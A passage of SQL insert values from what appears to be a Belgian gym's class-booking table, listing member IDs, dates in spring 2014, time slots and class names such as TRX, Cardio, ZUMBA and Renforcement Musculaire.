(825, 18, 'CTR', '2014-03-18', '17h30', '18h00', 'Cardio'),
(826, 18, 'CTR', '2014-03-20', '17h30', '18h00', 'Circuit Training'),
(827, 34, 'CTR', '2014-03-20', '17h30', '18h00', 'Circuit Training'),
(828, 33, 'CTR', '2014-03-20', '17h30', '18h00', 'Circuit Training'),
(837, 41, 'CTR', '2014-03-18', '18h15', '18h45', 'TRX'),
(836, 14, 'CTR', '2014-03-18', '18h15', '18h45', 'TRX'),
(835, 90, 'CTR', '2014-03-19', '18h15', '18h45', 'Cardio'),
(838, 38, 'CTR', '2014-03-18', '18h15', '18h45', 'TRX'),
(839, 37, 'CTR', '2014-03-18', '18h15', '18h45', 'TRX'),
(840, 17, 'CTR', '2014-03-18', '17h30', '18h00', 'Cardio'),
(841, 43, 'CTR', '2014-03-20', '17h30', '18h00', 'Circuit Training'),
(842, 43, 'CTR', '2014-03-26', '17h30', '18h00', 'Renforcement Musculaire'),
(843, 24, 'CTR', '2014-03-18', '18h15', '18h45', 'TRX'),
(844, 24, 'CTR', '2014-03-20', '17h30', '18h00', 'Circuit Training'),
(845, 24, 'CTR', '2014-03-20', '19h00', '19h30', 'Cardio'),
(846, 13, 'CTR', '2014-03-18', '17h30', '18h00', 'Cardio'),
(848, 47, 'CTR', '2014-03-21', '17h30', '18h00', 'TRX'),
(849, 48, 'CTR', '2014-03-19', '18h15', '18h45', 'Cardio'),
(850, 51, 'CTR', '2014-03-19', '17h30', '18h00', 'Renforcement Musculaire'),
(851, 31, 'CTR', '2014-03-19', '18h15', '18h45', 'Cardio'),
(852, 37, 'CTR', '2014-03-19', '17h30', '18h00', 'Renforcement Musculaire'),
(853, 68, 'CTR', '2014-03-19', '17h30', '18h00', 'Renforcement Musculaire'),
(871, 76, 'CTR', '2014-03-20', '17h30', '18h00', 'Circuit Training'),
(855, 36, 'CTR', '2014-03-19', '19h00', '19h30', 'TRX'),
(865, 14, 'CTR', '2014-03-20', '19h00', '19h30', 'Cardio'),
(857, 85, 'lim', '2014-03-19', '19h30', '20h00', 'Renforcement musculaire'),
(858, 53, 'CTR', '2014-03-19', '18h15', '18h45', 'Cardio'),
(859, 54, 'CTR', '2014-03-19', '18h15', '18h45', 'Cardio'),
(860, 41, 'CTR', '2014-03-19', '19h00', '19h30', 'TRX'),
(861, 42, 'CTR', '2014-03-19', '19h00', '19h30', 'TRX'),
(862, 40, 'CTR', '2014-03-19', '19h00', '19h30', 'TRX'),
(863, 21, 'CTR', '2014-03-20', '18h15', '18h45', 'Renforcement musculaire'),
(864, 20, 'CTR', '2014-03-20', '18h15', '18h45', 'Renforcement musculaire'),
(867, 17, 'CTR', '2014-03-20', '19h45', '20h45', 'ZUMBA'),
(868, 19, 'CTR', '2014-03-20', '17h30', '18h00', 'Circuit Training'),
(869, 19, 'CTR', '2014-03-25', '17h30', '18h00', 'Cardio'),
(872, 31, 'CTR', '2014-03-21', '18h15', '18h45', 'Circuit Training'),
(873, 63, 'CTR', '2014-03-21', '17h30', '18h00', 'TRX'),
(919, 49, 'CTR', '2014-03-27', '18h15', '18h45', 'Renforcement musculaire'),
(875, 48, 'CTR', '2014-03-21', '18h15', '18h45', 'Circuit Training'),
(876, 44, 'CTR', '2014-03-21', '18h15', '18h45', 'Circuit Training'),
(878, 80, 'CTR', '2014-03-22', '11h00', '11h30', 'TRX'),
(879, 21, 'CTR', '2014-03-24', '19h00', '19h30', 'Renforcement Musculaire'),
(880, 20, 'CTR', '2014-03-24', '19h00', '19h30', 'Renforcement Musculaire'),
(882, 89, 'CTR', '2014-03-24', '19h00', '19h30', 'Renforcement Musculaire'),
(883, 94, 'CTR', '2014-03-24', '19h00', '19h30', 'Renforcement Musculaire'),
(884, 88, 'CTR', '2014-03-24', '19h00', '19h30', 'Renforcement Musculaire'),
(885, 93, 'CTR', '2014-03-24', '19h00', '19h30', 'Renforcement Musculaire'),
(886, 87, 'CTR', '2014-03-24', '19h00', '19h30', 'Renforcement Musculaire'),
(887, 86, 'CTR', '2014-03-24', '18h15', '18h45', 'Circuit Training'),
(888, 38, 'CTR', '2014-03-23', '11h00', '11h30', 'Circuit Training'),
(889, 37, 'CTR', '2014-03-23', '11h00', '11h30', 'Circuit Training'),
(890, 48, 'CTR', '2014-03-24', '18h15', '18h45', 'Circuit Training'),
(891, 40, 'CTR', '2014-03-25', '18h15', '18h45', 'TRX'),
(892, 40, 'CTR', '2014-03-26', '17h30', '18h00', 'Renforcement Musculaire'),
(920, 80, 'CTR', '2014-03-27', '18h15', '18h45', 'Renforcement musculaire'),
(894, 30, 'CTR', '2014-03-24', '18h15', '18h45', 'Circuit Training'),
(895, 32, 'CTR', '2014-03-24', '19h45', '20h45', 'ZUMBA'),
(896, 23, 'CTR', '2014-03-24', '19h45', '20h45', 'ZUMBA'),
(897, 17, 'CTR', '2014-03-24', '19h45', '20h45', 'ZUMBA'),
(898, 95, 'CTR', '2014-03-30', '11h00', '11h30', 'Circuit Training'),
(899, 37, 'CTR', '2014-03-25', '17h30', '18h00', 'Cardio'),
(900, 38, 'CTR', '2014-03-25', '18h15', '18h45', 'TRX'),
(901, 14, 'CTR', '2014-03-25', '18h15', '18h45', 'TRX'),
(902, 44, 'CTR', '2014-03-25', '18h15', '18h45', 'TRX'),
(903, 69, 'CTR', '2014-03-26', '18h15', '18h45', 'Cardio'),
(904, 41, 'CTR', '2014-03-25', '18h15', '18h45', 'TRX'),
(905, 42, 'CTR', '2014-03-25', '18h15', '18h45', 'TRX'),
(906, 24, 'CTR', '2014-03-25', '17h30', '18h00', 'Cardio'),
(907, 24, 'CTR', '2014-03-25', '18h15', '18h45', 'TRX'),
(908, 41, 'CTR', '2014-03-27', '19h45', '20h45', 'ZUMBA'),
(909, 13, 'CTR', '2014-03-26', '17h30', '18h00', 'Renforcement Musculaire'),
(910, 90, 'CTR', '2014-03-26', '18h15', '18h45', 'Cardio'),
(911, 85, 'lim', '2014-03-26', '19h30', '20h00', 'Renforcement musculaire'),
(912, 32, 'CTR', '2014-03-26', '17h30', '18h00', 'Renforcement Musculaire'),
(918, 78, 'CTR', '2014-03-27', '18h15', '18h45', 'Renforcement musculaire'),
(917, 51, 'CTR', '2014-03-26', '17h30', '18h00', 'Renforcement Musculaire'),
(915, 28, 'CTR', '2014-03-26', '17h30', '18h00', 'Renforcement Musculaire'),
(921, 49, 'CTR', '2014-03-30', '11h00', '11h30', 'Circuit Training'),
(922, 48, 'CTR', '2014-03-30', '11h00', '11h30', 'Circuit Training'),
(923, 31, 'CTR', '2014-03-30', '11h00', '11h30', 'Circuit Training'),
(924, 14, 'CTR', '2014-03-30', '11h00', '11h30', 'Circuit Training'),
(925, 48, 'CTR', '2014-03-31', '18h15', '18h45', 'Circuit Training'),
(926, 86, 'CTR', '2014-03-31', '18h15', '18h45', 'Circuit Training'),
(946, 41, 'CTR', '2014-04-01', '18h15', '18h45', 'TRX'),
(929, 87, 'CTR', '2014-03-31', '19h00', '19h30', 'Renforcement Musculaire'),
(930, 89, 'CTR', '2014-03-31', '19h00', '19h30', 'Renforcement Musculaire'),
(931, 88, 'CTR', '2014-03-31', '19h00', '19h30', 'Renforcement Musculaire'),
(932, 94, 'CTR', '2014-03-31', '19h00', '19h30', 'Renforcement Musculaire'),
(933, 93, 'CTR', '2014-03-31', '19h00', '19h30', 'Renforcement Musculaire'),
(934, 19, 'CTR', '2014-04-01', '17h30', '18h00', 'Cardio'),
(935, 19, 'CTR', '2014-04-03', '17h30', '18h00', 'Circuit Training'),
(969, 95, 'CTR', '2014-04-03', '17h30', '18h00', 'Circuit Training'),
(937, 56, 'CTR', '2014-03-31', '18h15', '18h45', 'Circuit Training'),
(938, 32, 'CTR', '2014-03-31', '17h30', '18h00', 'TRX'),
(939, 30, 'CTR', '2014-03-31', '18h15', '18h45', 'Circuit Training'),
(982, 24, 'CTR', '2014-04-03', '17h30', '18h00', 'Circuit Training'),
(942, 18, 'CTR', '2014-04-10', '17h30', '18h00', 'Circuit Training'),
(943, 33, 'CTR', '2014-04-01', '18h15', '18h45', 'TRX'),
(944, 33, 'CTR', '2014-04-03', '17h30', '18h00', 'Circuit Training'),
(945, 33, 'CTR', '2014-04-10', '17h30', '18h00', 'Circuit Training'),
(948, 40, 'CTR', '2014-04-01', '18h15', '18h45', 'TRX'),
(949, 40, 'CTR', '2014-04-02', '17h30', '18h00', 'Renforcement Musculaire'),
(950, 34, 'CTR', '2014-04-01', '18h15', '18h45', 'TRX'),
(951, 34, 'CTR', '2014-04-03', '17h30', '18h00', 'Circuit Training'),
(952, 34, 'CTR', '2014-04-10', '17h30', '18h00', 'Circuit Training'),
(953, 31, 'CTR', '2014-04-02', '18h15', '18h45', 'Cardio'),
(954, 14, 'CTR', '2014-04-01', '18h15', '18h45', 'TRX'),
(955, 47, 'CTR', '2014-04-04', '17h30', '18h00', 'TRX'),
(956, 44, 'CTR', '2014-04-01', '18h15', '18h45', 'TRX'),
(957, 24, 'CTR', '2014-04-01', '17h30', '18h00', 'Cardio'),
(958, 24, 'CTR', '2014-04-01', '18h15', '18h45', 'TRX'),
(959, 42, 'CTR', '2014-04-01', '18h15', '18h45', 'TRX'),
(960, 48, 'CTR', '2014-04-02', '18h15', '18h45', 'Cardio'),
(961, 40, 'CTR', '2014-04-01', '17h30', '18h00', 'Cardio'),
(962, 13, 'CTR', '2014-04-01', '17h30', '18h00', 'Cardio'),
(963, 76, 'CTR', '2014-04-01', '17h30', '18h00', 'Cardio'),
(964, 56, 'CTR', '2014-04-02', '18h15', '18h45', 'Cardio'),
(965, 80, 'CTR', '2014-04-03', '18h15', '18h45', 'Renforcement musculaire'),
(966, 43, 'CTR', '2014-04-02', '19h45', '20h15', 'Circuit Training'),
(967, 17, 'CTR', '2014-04-02', '18h15', '18h45', 'Cardio'),
(978, 80, 'CTR', '2014-04-03', '17h30', '18h00', 'Circuit Training'),
(970, 32, 'CTR', '2014-04-02', '19h45', '20h15', 'Circuit Training'),
(971, 90, 'CTR', '2014-04-02', '18h15', '18h45', 'Cardio'),
(972, 90, 'CTR', '2014-04-02', '18h15', '18h45', 'Cardio'),
(981, 41, 'CTR', '2014-04-03', '18h15', '18h45', 'Renforcement musculaire'),
(974, 29, 'CTR', '2014-04-02', '17h30', '18h00', 'Renforcement Musculaire'),
(975, 28, 'CTR', '2014-04-02', '17h30', '18h00', 'Renforcement Musculaire'),
(976, 51, 'CTR', '2014-04-02', '17h30', '18h00', 'Renforcement Musculaire'),
(977, 37, 'CTR', '2014-04-02', '17h30', '18h00', 'Renforcement Musculaire'),
(979, 42, 'CTR', '2014-04-03', '18h15', '18h45', 'Renforcement musculaire'),
(980, 40, 'CTR', '2014-04-03', '18h15', '18h45', 'Renforcement musculaire'),
(983, 24, 'CTR', '2014-04-03', '18h15', '18h45', 'Renforcement musculaire'),
(985, 14, 'CTR', '2014-04-03', '19h00', '19h30', 'Cardio'),
(986, 48, 'CTR', '2014-04-04', '18h15', '18h45', 'Circuit Training'),
(994, 87, 'CTR', '2014-04-07', '19h00', '19h30', 'Renforcement Musculaire'),
(988, 95, 'CTR', '2014-04-06', '11h45', '12h15', 'Renforcement Musculaire'),
(989, 41, 'CTR', '2014-04-07', '19h45', '20h45', 'ZUMBA'),
(990, 49, 'CTR', '2014-04-03', '18h15', '18h45', 'Renforcement musculaire'),
(991, 31, 'CTR', '2014-04-04', '18h15', '18h45', 'Circuit Training'),
(992, 88, 'CTR', '2014-04-07', '19h00', '19h30', 'Renforcement Musculaire'),
(993, 44, 'CTR', '2014-04-04', '18h15', '18h45', 'Circuit Training'),
(1009, 60, 'CTR', '2014-04-07', '19h00', '19h30', 'Renforcement Musculaire'),
(996, 89, 'CTR', '2014-04-07', '19h00', '19h30', 'Renforcement Musculaire'),
(997, 94, 'CTR', '2014-04-07', '19h00', '19h30', 'Renforcement Musculaire'),
(998, 86, 'CTR', '2014-04-07', '18h15', '18h45', 'Circuit Training'),
(999, 63, 'CTR', '2014-04-04', '17h30', '18h00', 'TRX'),
(1000, 40, 'CTR', '2014-04-04', '17h30', '18h00', 'TRX'),
(1001, 14, 'CTR', '2014-04-06', '11h00', '11h30', 'Circuit Training'),
(1002, 40, 'CTR', '2014-04-06', '11h00', '11h30', 'Circuit Training'),
(1003, 97, 'CTR', '2014-04-10', '17h30', '18h00', 'Circuit Training'),
(1004, 21, 'CTR', '2014-04-07', '19h00', '19h30', 'Renforcement Musculaire'),
(1005, 20, 'CTR', '2014-04-07', '19h00', '19h30', 'Renforcement Musculaire'),
(1006, 40, 'CTR', '2014-04-07', '17h30', '18h00', 'TRX'),
(1007, 24, 'CTR', '2014-04-10', '17h30', '18h00', 'Circuit Training'),
(1008, 24, 'CTR', '2014-04-10', '18h15', '18h45', 'Renforcement musculaire'),
(1010, 62, 'CTR', '2014-04-07', '19h00', '19h30', 'Renforcement Musculaire'),
(1011, 28, 'CTR', '2014-04-09', '17h30', '18h00', 'Renforcement Musculaire'),
(1012, 28, 'CTR', '2014-04-16', '17h30', '18h00', 'Renforcement Musculaire'),
(1020, 29, 'CTR', '2014-04-10', '17h30', '18h00', 'Circuit Training'),
(1014, 19, 'CTR', '2014-04-10', '17h30', '18h00', 'Circuit Training'),
(1023, 32, 'CTR', '2014-04-10', '19h00', '19h30', 'Cardio'),
(1016, 29, 'CTR', '2014-04-09', '17h30', '18h00', 'Renforcement Musculaire'),
(1017, 86, 'CTR', '2014-04-09', '18h15', '18h45', 'Cardio'),
(1018, 38, 'CTR', '2014-04-09', '18h15', '18h45', 'Cardio'),
(1019, 44, 'CTR', '2014-04-11', '18h15', '18h45', 'Circuit Training'),
(1022, 17, 'CTR', '2014-04-10', '17h30', '18h00', 'Circuit Training'),
(1024, 38, 'CTR', '2014-04-10', '19h00', '19h30', 'Cardio'),
(1025, 37, 'CTR', '2014-04-10', '19h00', '19h30', 'Cardio'),
(1026, 48, 'CTR', '2014-04-11', '18h15', '18h45', 'Circuit Training'),
(1027, 31, 'CTR', '2014-04-11', '18h15', '18h45', 'Circuit Training'),
(1028, 30, 'CTR', '2014-04-11', '18h15', '18h45', 'Circuit Training'),
(1036, 32, 'CTR', '2014-04-15', '18h30', '19h30', 'Cross Training Outdoor à la citadelle de Namur'),
(1030, 95, 'CTR', '2014-04-16', '19h00', '19h30', 'TRX'),
(1031, 92, 'CTR', '2014-04-13', '11h00', '11h30', 'Circuit Training'),
(1032, 48, 'CTR', '2014-04-13', '11h00', '11h30', 'Circuit Training'),
(1033, 14, 'CTR', '2014-04-13', '11h00', '11h30', 'Circuit Training'),
(1034, 30, 'CTR', '2014-04-13', '11h00', '11h30', 'Circuit Training'),
(1035, 31, 'CTR', '2014-04-13', '11h00', '11h30', 'Circuit Training'),
(1037, 43, 'CTR', '2014-04-16', '17h30', '18h00', 'Renforcement Musculaire'),
(1061, 35, 'CTR', '2014-04-22', '17h30', '18h00', 'Cardio'),
(1040, 18, 'CTR', '2014-04-17', '17h30', '18h00', 'Circuit Training'),
(1041, 98, 'CTR', '2014-04-16', '19h00', '19h30', 'TRX'),
(1042, 30, 'CTR', '2014-04-16', '17h30', '18h00', 'Renforcement Musculaire'),
(1043, 29, 'CTR', '2014-04-16', '17h30', '18h00', 'Renforcement Musculaire'),
(1044, 34, 'CTR', '2014-04-17', '17h30', '18h00', 'Circuit Training'),
(1045, 96, 'CTR', '2014-04-16', '17h30', '18h00', 'Renforcement Musculaire'),
(1046, 29, 'CTR', '2014-04-17', '17h30', '18h00', 'Circuit Training'),
(1047, 28, 'CTR', '2014-04-17', '17h30', '18h00', 'Circuit Training'),
(1048, 65, 'CTR', '2014-04-17', '18h15', '18h45', 'Renforcement musculaire'),
(1049, 92, 'CTR', '2014-04-17', '17h30', '18h00', 'Circuit Training'),
(1050, 19, 'CTR', '2014-04-17', '17h30', '18h00', 'Circuit Training'),
(1079, 95, 'CTR', '2014-04-25', '19h00', '19h30', 'Renforcement Musculaire'),
(1052, 19, 'CTR', '2014-04-24', '17h30', '18h00', 'Circuit Training'),
(1053, 19, 'CTR', '2014-04-29', '17h30', '18h00', 'Cardio'),
(1054, 98, 'CTR', '2014-04-17', '18h15', '18h45', 'Renforcement musculaire'),
(1055, 95, 'CTR', '2014-04-17', '18h15', '18h45', 'Renforcement musculaire'),
(1056, 31, 'CTR', '2014-04-18', '18h15', '18h45', 'Circuit Training'),
(1057, 44, 'CTR', '2014-04-18', '18h15', '18h45', 'Circuit Training'),
(1059, 21, 'CTR', '2014-04-22', '17h30', '18h00', 'Cardio'),
(1060, 20, 'CTR', '2014-04-22', '17h30', '18h00', 'Cardio'),
(1062, 65, 'CTR', '2014-04-22', '17h30', '18h00', 'Cardio'),
(1063, 14, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1064, 99, 'CTR', '2014-04-22', '17h30', '18h00', 'Cardio'),
(1065, 99, 'CTR', '2014-04-24', '17h30', '18h00', 'Circuit Training'),
(1066, 80, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1067, 80, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1068, 42, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1069, 77, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1070, 40, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1071, 41, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1072, 47, 'CTR', '2014-04-25', '17h30', '18h00', 'TRX'),
(1073, 44, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1074, 44, 'CTR', '2014-04-25', '18h15', '18h45', 'Circuit Training'),
(1075, 24, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1076, 24, 'CTR', '2014-04-24', '17h30', '18h00', 'Circuit Training'),
(1077, 24, 'CTR', '2014-04-24', '18h15', '18h45', 'Renforcement musculaire'),
(1078, 76, 'CTR', '2014-04-22', '17h30', '18h00', 'Cardio'),
(1088, 92, 'CTR', '2014-04-23', '17h30', '18h00', 'Renforcement Musculaire'),
(1081, 96, 'CTR', '2014-04-22', '18h15', '18h45', 'TRX'),
(1082, 41, 'CTR', '2014-04-24', '19h45', '20h45', 'ZUMBA'),
(1083, 42, 'CTR', '2014-04-24', '19h45', '20h45', 'ZUMBA'),
(1084, 28, 'CTR', '2014-04-23', '17h30', '18h00', 'Renforcement Musculaire'),
(1085, 40, 'CTR', '2014-04-23', '17h30', '18h00', 'Renforcement Musculaire'),
(1086, 18, 'CTR', '2014-04-24', '17h30', '18h00', 'Circuit Training'),
(1087, 34, 'CTR', '2014-04-24', '17h30', '18h00', 'Circuit Training'),
(1089, 57, 'CTR', '2014-04-23', '18h15', '18h45', 'Cardio'),
(1090, 80, 'CTR', '2014-04-23', '18h15', '18h45', 'Cardio'),
(1091, 29, 'CTR', '2014-04-23', '17h30', '18h00', 'Renforcement Musculaire'),
(1092, 85, 'lim', '2014-04-23', '19h30', '20h00', 'Renforcement musculaire'),
(1093, 30, 'CTR', '2014-04-23', '18h15', '18h45', 'Cardio'),
(1094, 51, 'CTR', '2014-04-23', '17h30', '18h00', 'Renforcement Musculaire'),
(1095, 28, 'CTR', '2014-04-24', '17h30', '18h00', 'Circuit Training'),
(1096, 29, 'CTR', '2014-04-24', '17h30', '18h00', 'Circuit Training'),
(9472, 265, 'CTR', '2017-04-08', '10h00', '11h00', 'Oubli encodage Train With Me'),
(1098, 95, 'CTR', '2014-04-28', '17h30', '18h00', 'TRX'),
(1099, 33, 'CTR', '2014-04-24', '17h30', '18h00', 'Circuit Training'),
(1100, 35, 'CTR', '2014-04-24', '18h15', '18h45', 'Renforcement musculaire'),
(1101, 43, 'CTR', '2014-04-24', '19h00', '19h30', 'Cardio'),
(1102, 43, 'CTR', '2014-04-24', '19h45', '20h45', 'ZUMBA'),
(1103, 40, 'CTR', '2014-04-24', '18h15', '18h45', 'Renforcement musculaire'),
(1104, 76, 'CTR', '2014-04-24', '17h30', '18h00', 'Circuit Training'),
(1105, 14, 'CTR', '2014-04-24', '19h00', '19h30', 'Cardio'),
(1133, 35, 'CTR', '2014-04-29', '17h30', '18h00', 'Cardio'),
(1107, 48, 'CTR', '2014-04-25', '18h15', '18h45', 'Circuit Training'),
(1108, 95, 'CTR', '2014-04-27', '11h00', '11h30', 'Circuit Training'),
(1110, 99, 'CTR', '2014-04-29', '17h30', '18h00', 'Cardio'),
(1111, 40, 'CTR', '2014-04-27', '11h00', '11h30', 'Circuit Training'),
(1112, 31, 'CTR', '2014-04-27', '11h00', '11h30', 'Circuit Training'),
(1167, 47, 'CTR', '2014-05-09', '17h30', '18h00', 'TRX'),
(1114, 99, 'CTR', '2014-04-27', '11h00', '11h30', 'Circuit Training'),
(1115, 48, 'CTR', '2014-04-27', '11h00', '11h30', 'Circuit Training'),
(1116, 35, 'CTR', '2014-04-27', '11h00', '11h30', 'Circuit Training'),
(1117, 98, 'CTR', '2014-04-27', '11h00', '11h30', 'Circuit Training'),
(1118, 14, 'CTR', '2014-04-27', '11h00', '11h30', 'Circuit Training'),
(1119, 99, 'CTR', '2014-04-28', '19h45', '20h45', 'ZUMBA'),
(1120, 4, 'CTR', '2014-04-28', '19h45', '20h45', 'ZUMBA'),
(1121, 98, 'CTR', '2014-04-28', '17h30', '18h00', 'TRX'),
(1122, 100, 'CTR', '2014-04-29', '19h00', '19h30', 'Circuit Training'),
(1152, 100, 'CTR', '2014-05-02', '18h15', '18h45', 'Circuit Training'),
(1143, 14, 'CTR', '2014-04-29', '18h15', '18h45', 'TRX'),
(1125, 13, 'CTR', '2014-04-28', '17h30', '18h00', 'TRX'),
(1126, 32, 'CTR', '2014-04-28', '19h45', '20h45', 'ZUMBA'),
(1127, 89, 'CTR', '2014-04-28', '19h00', '19h30', 'Renforcement Musculaire'),
(1136, 33, 'CTR', '2014-04-29', '19h00', '19h30', 'Circuit Training'),
(1129, 87, 'CTR', '2014-04-28', '19h00', '19h30', 'Renforcement Musculaire'),
(1130, 93, 'CTR', '2014-04-28', '19h00', '19h30', 'Renforcement Musculaire'),
(1131, 88, 'CTR', '2014-04-28', '19h00', '19h30', 'Renforcement Musculaire'),
(1132, 92, 'CTR', '2014-04-28', '19h00', '19h30', 'Renforcement Musculaire'),
(1135, 34, 'CTR', '2014-04-29', '19h00', '19h30', 'Circuit Training'),
(1137, 101, 'CTR', '2014-04-29', '18h15', '18h45', 'TRX'),
(1138, 101, 'CTR', '2014-05-02', '18h15', '18h45', 'Circuit Training'),
(1139, 44, 'CTR', '2014-04-29', '18h15', '18h45', 'TRX'),
(1140, 44, 'CTR', '2014-05-02', '18h15', '18h45', 'Circuit Training'),
(1141, 40, 'CTR', '2014-04-29', '18h15', '18h45', 'TRX'),
(1142, 40, 'CTR', '2014-04-29', '17h30', '18h00', 'Cardio'),
(1144, 43, 'CTR', '2014-04-29', '19h00', '19h30', 'Circuit Training'),
(1145, 43, 'CTR', '2014-04-29', '19h45', '20h15', 'Renforcement Musculaire'),
(1166, 80, 'CTR', '2014-05-03', '11h00', '11h30', 'TRX'),
(1147, 37, 'CTR', '2014-04-29', '19h00', '19h30', 'Circuit Training'),
(1148, 38, 'CTR', '2014-04-29', '19h00', '19h30', 'Circuit Training'),
(1149, 32, 'CTR', '2014-04-29', '19h00', '19h30', 'Circuit Training'),
(1150, 32, 'CTR', '2014-04-29', '19h45', '20h15', 'Renforcement Musculaire'),
(1151, 14, 'CTR', '2014-04-29', '19h00', '19h30', 'Circuit Training'),
(1198, 62, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1154, 100, 'CTR', '2014-05-06', '17h30', '18h00', 'Cardio'),
(1196, 100, 'CTR', '2014-05-06', '19h00', '19h30', 'Circuit Training'),
(1156, 97, 'CTR', '2014-04-30', '17h30', '18h00', 'Renforcement Musculaire'),
(1157, 80, 'CTR', '2014-04-30', '17h30', '18h00', 'Renforcement Musculaire'),
(1162, 29, 'CTR', '2014-04-30', '17h30', '18h00', 'Renforcement Musculaire'),
(1159, 57, 'CTR', '2014-04-30', '18h15', '18h45', 'Cardio'),
(1160, 26, 'CTR', '2014-04-30', '18h15', '18h45', 'Cardio'),
(1161, 90, 'CTR', '2014-04-30', '18h15', '18h45', 'Cardio'),
(1164, 48, 'CTR', '2014-05-02', '18h15', '18h45', 'Circuit Training'),
(1165, 31, 'CTR', '2014-05-02', '18h15', '18h45', 'Circuit Training'),
(1168, 13, 'CTR', '2014-05-03', '11h00', '11h30', 'TRX'),
(1169, 100, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1170, 100, 'CTR', '2014-05-08', '19h00', '19h30', 'Cardio'),
(1171, 100, 'CTR', '2014-05-09', '18h15', '18h45', 'Circuit Training'),
(1172, 97, 'CTR', '2014-05-07', '17h30', '18h00', 'Renforcement Musculaire'),
(1173, 78, 'CTR', '2014-05-06', '18h15', '18h45', 'TRX'),
(1174, 31, 'CTR', '2014-05-04', '11h00', '11h30', 'Circuit Training'),
(1175, 14, 'CTR', '2014-05-04', '11h00', '11h30', 'Circuit Training'),
(1176, 48, 'CTR', '2014-05-04', '11h00', '11h30', 'Circuit Training'),
(1177, 92, 'CTR', '2014-05-03', '11h00', '11h30', 'TRX'),
(1178, 21, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1179, 20, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1180, 48, 'CTR', '2014-05-05', '18h15', '18h45', 'Circuit Training'),
(1181, 26, 'CTR', '2014-05-05', '18h15', '18h45', 'Circuit Training'),
(1182, 26, 'CTR', '2014-05-07', '18h15', '18h45', 'Cardio'),
(1183, 26, 'CTR', '2014-05-09', '18h15', '18h45', 'Circuit Training'),
(1184, 88, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1185, 87, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1186, 93, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1187, 89, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1188, 94, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1189, 13, 'CTR', '2014-05-06', '17h30', '18h00', 'Cardio'),
(1190, 92, 'CTR', '2014-05-05', '18h15', '18h45', 'Circuit Training'),
(1191, 32, 'CTR', '2014-05-05', '19h45', '20h45', 'ZUMBA'),
(1192, 43, 'CTR', '2014-05-08', '19h00', '19h30', 'Cardio'),
(1193, 43, 'CTR', '2014-05-08', '19h45', '20h45', 'ZUMBA'),
(1194, 96, 'CTR', '2014-05-08', '19h00', '19h30', 'Cardio'),
(1195, 96, 'CTR', '2014-05-08', '19h45', '20h45', 'ZUMBA'),
(1197, 100, 'CTR', '2014-05-08', '19h45', '20h45', 'ZUMBA'),
(1199, 60, 'CTR', '2014-05-05', '19h00', '19h30', 'Renforcement Musculaire'),
(1200, 40, 'CTR', '2014-05-06', '18h15', '18h45', 'TRX'),
(1211, 19, 'CTR', '2014-05-08', '17h30', '18h00', 'Circuit Training'),
(1202, 19, 'CTR', '2014-05-06', '17h30', '18h00', 'Cardio'),
(1203, 73, 'CTR', '2014-05-06', '19h00', '19h30', 'Circuit Training'),
(1205, 40, 'CTR', '2014-05-06', '19h00', '19h30', 'Circuit Training'),
(1206, 24, 'CTR', '2014-05-06', '18h15', '18h45', 'TRX'),
(1207, 24, 'CTR', '2014-05-08', '17h30', '18h00', 'Circuit Training'),
(1208, 24, 'CTR', '2014-05-08', '18h15', '18h45', 'Renforcement musculaire'),
(1209, 14, 'CTR', '2014-05-06', '18h15', '18h45', 'TRX'),
(1210, 41, 'CTR', '2014-05-06', '18h15', '18h45', 'TRX'),
(1212, 57, 'CTR', '2014-05-07', '18h15', '18h45', 'Cardio'),
(1213, 41, 'CTR', '2014-05-08', '19h45', '20h45', 'ZUMBA'),
(1214, 14, 'CTR', '2014-05-06', '19h00', '19h30', 'Circuit Training'),
(1215, 39, 'CTR', '2014-05-06', '19h00', '19h30', 'Circuit Training'),
(1216, 49, 'CTR', '2014-05-07', '18h15', '18h45', 'Cardio'),
(1217, 73, 'CTR', '2014-05-08', '19h00', '19h30', 'Cardio'),
(1218, 29, 'CTR', '2014-05-07', '17h30', '18h00', 'Renforcement Musculaire'),
(1219, 40, 'CTR', '2014-05-07', '17h30', '18h00', 'Renforcement Musculaire'),
(1220, 28, 'CTR', '2014-05-07', '17h30', '18h00', 'Renforcement Musculaire'),
(1221, 40, 'CTR', '2014-05-08', '17h30', '18h00', 'Circuit Training'),
(1222, 40, 'CTR', '2014-05-08', '18h15', '18h45', 'Renforcement musculaire'),
(1223, 51, 'CTR', '2014-05-07', '17h30', '18h00', 'Renforcement Musculaire'),
(1224, 21, 'CTR', '2014-05-08', '18h15', '18h45', 'Renforcement musculaire'),
(1225, 20, 'CTR', '2014-05-08', '18h15', '18h45', 'Renforcement musculaire'),
(1226, 17, 'CTR', '2014-05-08', '17h30', '18h00', 'Circuit Training'),
(1227, 31, 'CTR', '2014-05-09', '18h15', '18h45', 'Circuit Training'),
(1228, 103, 'CTR', '2014-05-09', '18h15', '18h45', 'Circuit Training'),
(1229, 21, 'CTR', '2014-05-12', '19h00', '19h30', 'Renforcement Musculaire'),
(1230, 20, 'CTR', '2014-05-12', '19h00', '19h30', 'Renforcement Musculaire'),
(1231, 48, 'CTR', '2014-05-09', '18h15', '18h45', 'Circuit Training'),
(1232, 44, 'CTR', '2014-05-09', '18h15', '18h45', 'Circuit Training'),
(1233, 63, 'CTR', '2014-05-09', '17h30', '18h00', 'TRX'),
(1234, 40, 'CTR', '2014-05-09', '17h30', '18h00', 'TRX'),
